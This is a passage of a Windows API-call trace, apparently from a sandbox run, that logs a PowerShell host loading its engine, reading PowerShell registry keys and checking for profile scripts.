	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.949] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.951] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0354.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.951] CoTaskMemFree (pv=0x34f1b0) 
	[0354.953] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0354.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.953] CoTaskMemFree (pv=0x34f1b0) 
	[0354.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.973] VirtualQuery (in: lpAddress=0xcbaa0, lpBuffer=0xcc960, dwLength=0x30 | out: lpBuffer=0xcc960*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0354.978] VirtualQuery (in: lpAddress=0xcbaa0, lpBuffer=0xcc960, dwLength=0x30 | out: lpBuffer=0xcc960*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.978] VirtualQuery (in: lpAddress=0xcb2f0, lpBuffer=0xcc1b0, dwLength=0x30 | out: lpBuffer=0xcc1b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.978] VirtualQuery (in: lpAddress=0xcb2f0, lpBuffer=0xcc1b0, dwLength=0x30 | out: lpBuffer=0xcc1b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.979] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd8f8 | out: phkResult=0xcd8f8*=0x338) returned 0x0
	[0354.979] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd87c, lpData=0x0, lpcbData=0xcd878*=0x0 | out: lpType=0xcd87c*=0x1, lpData=0x0, lpcbData=0xcd878*=0x56) returned 0x0
	[0354.979] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a0260
	[0354.979] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd84c, lpData=0x1b7a0260, lpcbData=0xcd848*=0x56 | out: lpType=0xcd84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd848*=0x56) returned 0x0
	[0354.979] CoTaskMemFree (pv=0x1b7a0260) 
	[0354.979] RegCloseKey (hKey=0x338) returned 0x0
	[0354.979] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd8f8 | out: phkResult=0xcd8f8*=0x338) returned 0x0
	[0354.979] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd87c, lpData=0x0, lpcbData=0xcd878*=0x0 | out: lpType=0xcd87c*=0x1, lpData=0x0, lpcbData=0xcd878*=0x56) returned 0x0
	[0354.979] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a0260
	[0354.979] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd84c, lpData=0x1b7a0260, lpcbData=0xcd848*=0x56 | out: lpType=0xcd84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd848*=0x56) returned 0x0
	[0354.979] CoTaskMemFree (pv=0x1b7a0260) 
	[0354.980] RegCloseKey (hKey=0x338) returned 0x0
	[0354.980] CoTaskMemAlloc (cb=0x20c) returned 0x1b78d830
	[0354.980] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b78d830 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0354.980] CoTaskMemFree (pv=0x1b78d830) 
	[0354.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0354.980] CoTaskMemAlloc (cb=0x20c) returned 0x1b78d830
	[0354.980] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b78d830 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0354.980] CoTaskMemFree (pv=0x1b78d830) 
	[0354.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0354.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0354.981] SetErrorMode (uMode=0x1) returned 0x1
	[0354.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd860 | out: lpFileInformation=0xcd860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.077] SetErrorMode (uMode=0x1) returned 0x1
	[0355.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0355.078] SetErrorMode (uMode=0x1) returned 0x1
	[0355.078] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd860 | out: lpFileInformation=0xcd860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.078] SetErrorMode (uMode=0x1) returned 0x1
	[0355.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0355.078] SetErrorMode (uMode=0x1) returned 0x1
	[0355.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd860 | out: lpFileInformation=0xcd860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.078] SetErrorMode (uMode=0x1) returned 0x1
	[0355.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0355.078] SetErrorMode (uMode=0x1) returned 0x1
	[0355.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd860 | out: lpFileInformation=0xcd860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0355.078] SetErrorMode (uMode=0x1) returned 0x1
	[0355.079] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.079] CoTaskMemFree (pv=0x34f1b0) 
	[0355.079] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.079] CoTaskMemFree (pv=0x34f1b0) 
	[0355.080] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.080] CoTaskMemFree (pv=0x34f1b0) 
	[0355.080] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.080] CoTaskMemFree (pv=0x34f1b0) 
	[0355.083] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.083] CoTaskMemFree (pv=0x34f1b0) 
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x33c
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x348
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
	[0355.084] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x354
	[0355.085] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0355.085] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0355.085] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.085] CoTaskMemFree (pv=0x34f1b0) 
	[0355.087] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0355.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcda40 | out: lpMode=0xcda40) returned 1
	[0355.088] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.088] CoTaskMemFree (pv=0x34f1b0) 
	[0355.091] SetEvent (hEvent=0x344) returned 1
	[0355.091] SetEvent (hEvent=0x338) returned 1
	[0355.091] SetEvent (hEvent=0x33c) returned 1
	[0355.091] SetEvent (hEvent=0x340) returned 1
	[0355.092] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0355.093] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.093] CoTaskMemFree (pv=0x34f1b0) 
	[0355.094] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd798 | out: phkResult=0xcd798*=0x35c) returned 0x0
	[0355.094] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd71c, lpData=0x0, lpcbData=0xcd718*=0x0 | out: lpType=0xcd71c*=0x0, lpData=0x0, lpcbData=0xcd718*=0x0) returned 0x2

Thread:
	id = 134
	os_tid = 0xb60


Thread:
	id = 141
	os_tid = 0xb08


Thread:
	id = 178
	os_tid = 0xba4


Thread:
	id = 260
	os_tid = 0xd68


Thread:
	id = 263
	os_tid = 0xd80

	[0309.046] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0346.199] LocalFree (hMem=0x2c7290) returned 0x0
	[0346.199] RegCloseKey (hKey=0x330) returned 0x0
	[0346.199] LocalFree (hMem=0x2c72c0) returned 0x0
	[0346.200] CloseHandle (hObject=0x320) returned 1
	[0346.200] CloseHandle (hObject=0x13) returned 1
	[0346.200] CloseHandle (hObject=0xf) returned 1
	[0346.201] RegCloseKey (hKey=0x30c) returned 0x0
	[0346.201] RegCloseKey (hKey=0x308) returned 0x0
	[0346.201] RegCloseKey (hKey=0x304) returned 0x0
	[0348.678] RegCloseKey (hKey=0x334) returned 0x0
	[0351.448] RegCloseKey (hKey=0x330) returned 0x0
	[0351.448] RegCloseKey (hKey=0x320) returned 0x0
	[0351.448] RegCloseKey (hKey=0x30c) returned 0x0
	[0351.449] RegCloseKey (hKey=0x304) returned 0x0
	[0351.449] RegCloseKey (hKey=0x334) returned 0x0
	[0351.449] RegCloseKey (hKey=0x348) returned 0x0
	[0351.449] RegCloseKey (hKey=0x344) returned 0x0
	[0351.450] RegCloseKey (hKey=0x340) returned 0x0
	[0351.450] RegCloseKey (hKey=0x33c) returned 0x0
	[0351.450] RegCloseKey (hKey=0x338) returned 0x0
	[0354.162] RegCloseKey (hKey=0x37c) returned 0x0
	[0354.162] RegCloseKey (hKey=0x378) returned 0x0
	[0354.162] RegCloseKey (hKey=0x374) returned 0x0
	[0354.163] RegCloseKey (hKey=0x370) returned 0x0
	[0354.163] RegCloseKey (hKey=0x30c) returned 0x0
	[0354.163] RegCloseKey (hKey=0x388) returned 0x0
	[0354.163] RegCloseKey (hKey=0x368) returned 0x0
	[0354.164] RegCloseKey (hKey=0x364) returned 0x0
	[0354.164] RegCloseKey (hKey=0x360) returned 0x0
	[0354.164] RegCloseKey (hKey=0x35c) returned 0x0
	[0354.164] RegCloseKey (hKey=0x358) returned 0x0
	[0354.165] RegCloseKey (hKey=0x330) returned 0x0
	[0354.165] RegCloseKey (hKey=0x320) returned 0x0
	[0354.165] RegCloseKey (hKey=0x354) returned 0x0
	[0354.165] RegCloseKey (hKey=0x384) returned 0x0
	[0354.166] RegCloseKey (hKey=0x380) returned 0x0
	[0354.166] RegCloseKey (hKey=0x304) returned 0x0
	[0354.166] RegCloseKey (hKey=0x334) returned 0x0
	[0354.166] RegCloseKey (hKey=0x348) returned 0x0
	[0354.166] RegCloseKey (hKey=0x344) returned 0x0
	[0354.167] RegCloseKey (hKey=0x340) returned 0x0
	[0354.167] RegCloseKey (hKey=0x33c) returned 0x0
	[0354.167] RegCloseKey (hKey=0x338) returned 0x0
	[0354.167] RegCloseKey (hKey=0x2e4) returned 0x0
	[0641.521] RegCloseKey (hKey=0x35c) returned 0x0

Thread:
	id = 268
	os_tid = 0xdac


Thread:
	id = 371
	os_tid = 0xfd8

	[0355.196] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0355.200] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0355.204] CoTaskMemAlloc (cb=0x104) returned 0x34f1b0
	[0355.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34f1b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0355.204] CoTaskMemFree (pv=0x34f1b0) 
